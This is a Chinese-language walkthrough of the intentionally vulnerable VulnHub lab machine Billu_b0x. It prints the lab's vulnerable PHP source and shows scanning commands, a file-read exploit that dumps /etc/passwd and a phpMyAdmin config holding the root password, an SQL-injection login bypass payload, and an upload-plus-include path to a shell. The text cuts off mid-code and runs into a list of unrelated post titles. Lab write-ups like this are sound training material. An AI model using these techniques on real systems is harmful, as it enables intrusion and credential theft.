VulnHub渗透测试实战靶场 - Billu_b0x

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - Billu_b0x相关的知识,希望对你有一定的参考价值。

VulnHub渗透测试实战靶场 - Billu_b0x

环境下载

戳此进行环境下载

Billu_b0x靶机搭建

将下载好的靶机环境,用VMware导入,将靶机和攻击机的网络连接设置为NAT模式


渗透测试

信息搜集

用Kali中的arp扫描探测一下:sudo arp-scan -l

使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP:sudo nmap -sP 192.168.23.1/24

确定目标ip地址:192.168.23.130
用Nmap进行深度扫描:sudo nmap -sS -A 192.168.23.130 -oN billu.txt
发现目标开放了22端口和80端口

漏洞挖掘

访问80端口进入web首页,发现用户名口令输入框,并提示"Show me your SQLI skills"

漏洞挖掘思路:

  • SQL注入:首页提示注入,想办法注入成功
  • 暴破目录:用DirBuster暴破,看是否有新网页,找新漏洞
  • 漏洞扫描:暴破的新网页,送进AWVS或APPScan扫漏洞
  • 手动挖掘:暴破的新页面,通过Firefox挂burp代理,在burp中观察Request和Response包,手动找漏洞
  • 查看每个网页的源码,看是否有提示
  • 如得到用户名,密码,尝试登录ssh,如能连接上,无需反弹shell了

先用sqlmap进行测试:sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql,发现并没有什么效果

使用dirsearch扫描一下网站目录:python3 dirsearch.py -u 192.168.23.130 -e *.php,发现存在挺多200的页面

测试后发现在http://192.168.23.130/test.php存在文件包含

利用该漏洞,查看一下之前探测网站目录得到的php文件内容

  • c.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>
  • add.php
<?php


echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
	<input type=text name=name value="name">
	<input type=text name=address value="address">
	<input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';



?>
  • index.php
<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\\'','',urldecode($_POST['un']));
	$pass=str_replace('\\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\\''.$pass.'\\' and uname=\\''.$uname.'\\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed<br>";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "<script>alert('Try again');</script>";
}
	
}
echo "<font size=5 face=\\"comic sans ms\\" style=\\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>
  • test.php
?php


function file_download($download)
{
	if(file_exists($download))
				{
					header("Content-Description: File Transfer"); 
					
					header('Content-Transfer-Encoding: binary');
					header('Expires: 0');
					header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
					header('Pragma: public');
					header('Accept-Ranges: bytes');
					header('Content-Disposition: attachment; filename="'.basename($download).'"'); 
					header('Content-Length: ' . filesize($download));
					header('Content-Type: application/octet-stream'); 
					ob_clean();
					flush();
					readfile ($download);
				}
				else
				{
				echo "file not found";	
				}
	
}

if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{

echo '\\'file\\' parameter is empty. Please provide file path in \\'file\\' parameter ';
}
  • panel.php
<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
		header('Location: index.php', true, 302);
		exit();
	
}



echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}


if(isset($_POST['upload']))
{
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\\/jpeg/',$filetype )  || preg_match('/image\\/png/',$filetype ) || preg_match('/image\\/gif/',$filetype ))
				{
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 {
							  echo "Uploaded successfully ";
							  $update='insert into users(name,address,image,id) values(\\''.$name.'\\',\\''.$address.'\\',\\''.$iname.'\\', \\''.$id.'\\')'; 
							 mysqli_query($conn, $update);
							  
							}
				}
			else
			{
				echo "<br>i told you dear, only png,jpg and gif file are allowed";
			}
	}
	else
	{
		echo "<br>only png,jpg and gif file are allowed";
		
	}
}


}

?>
  • /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

审计得到的有关信息可以发现:

  • /etc/passwd中,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root
  • c.php中发现mysql连接用户名:billu,密码:b0x_billu以及数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin,尝试后发现无法登录(原因在后面阐述)

重装环境之后再次用之前得到的信息登录,在ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it

getshell

获得root权限

继续暴破phpmy目录,文件包含phpmyadmin配置文件,由于phpmyadmin的默认的配置文件是config.inc.php,用之前文件包含的漏洞得到phpmyadmin的默认的配置文件的内容,得到用户为root,密码为roottoor

<?php
/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';


/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>

用xshell登录,得到root权限
之前mysql登不上检测后发现mysql状态为:mysql stop/waiting,推测mysql被之前的高线程目录暴破、扫描导致故障

获得非root权限

  • 方式一:用phpmyadmin中得到的web页面登录账号密码登录

  • 方式二:审计index.php源码,发现以下过滤规则:
$uname=str_replace('\\'','',urldecode($_POST['un']));
$pass=str_replace('\\'','',urldecode($_POST['ps']));

str_replace的作用是将字符串\\' 替换为空,因此构造SQL注入登录payload时,必须含有\\'字符串,否则会报错,urldecode的作用是将输入解码,所以可以用Payload:用户名密码均为' or 1=1 -- \\',成功登入web页面

点击add user进入添加账号界面,这是一个图片上传漏洞点,利用图片上传和文件包含获得shell
查看之前利用文件包含漏洞获得的panel.php源码,发现panel.php存在本地文件包含漏洞

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker


 VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1


 VulnHub渗透测试实战靶场-HA: FORENSICS


 VulnHub渗透测试实战靶场 - FUNBOX: CTF


 VulnHub渗透测试实战靶场 - Funbox: GaoKao


 VulnHub渗透测试实战靶场 - DevContainer:1